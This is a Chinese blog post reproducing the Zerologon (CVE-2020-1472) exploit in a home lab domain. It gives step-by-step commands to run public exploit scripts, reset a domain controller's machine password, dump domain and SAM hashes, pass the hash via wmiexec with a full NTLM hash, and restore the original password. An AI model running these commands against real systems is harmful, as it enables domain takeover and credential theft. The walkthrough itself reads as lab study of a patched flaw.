CVE-2020-1472 复现

admin 2020年10月20日09:00:50评论275 views字数 1027阅读3分25秒阅读模式

CVE-2020-1472 复现

攻击机:kali2020      受害者:windows2008
https://github.com/SecuraBV/CVE-2020-1472    poc
https://github.com/dirkjanm/CVE-2020-1472     exp

1、本地搭建一个域环境

CVE-2020-1472 复现


CVE-2020-1472 复现


2、使用poc验证
既然提示安装东西,那就   pip install -r requirements.txt  ,之后再执行     python3 zerologon_tester.py <主机名> <ip>

CVE-2020-1472 复现


3、使用exp攻击,但是这个时候很多人的脚本回报错,是因为缺少 impacket,https://github.com/SecureAuthCorp/impacket  ,python3 setup.py install  //安装impacket,然后执行exp
python3 cve-2020-1472-exploit.py owa 192.168.137.137

CVE-2020-1472 复现


4、使用impacket的secretsdump.py导出域控制上的hash
python3 secretsdump.py god.org/[email protected] -no-pass

CVE-2020-1472 复现



5、利用获取到的管理员hash来远程操作域控服务器
python3 wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:13cf6cfe1f2fc41cd286c7c8caec978b god.org/[email protected]

CVE-2020-1472 复现


CVE-2020-1472 复现


CVE-2020-1472 复现



6、获取管理员hash,远程连接导出sam数据库中的原来的计算机hash

CVE-2020-1472 复现


python3 secretsdump.py -sam sam.save -system system.save -security security.save LOCAL

CVE-2020-1472 复现



7、恢复计算机的hash
下载脚本 https://github.com/risksense/zerologon
python3 reinstall_original_pw.py owa 192.168.137.137 ad611ebf4fd2de9448a33ba693b212f4     //注意hash的部分,只有后半部分

CVE-2020-1472 复现


8、恢复计算机的hash
使用impacket的脚本来登录域控来验证hash
使用7步骤的脚本回复hash前

CVE-2020-1472 复现


使用7步骤脚本恢复hash后

CVE-2020-1472 复现



CVE-2020-1472 复现

本文始发于微信公众号(T00ls):CVE-2020-1472 复现

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2020年10月20日09:00:50
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2020-1472 复现http://cn-sec.com/archives/156232.html

发表评论

匿名网友 填写信息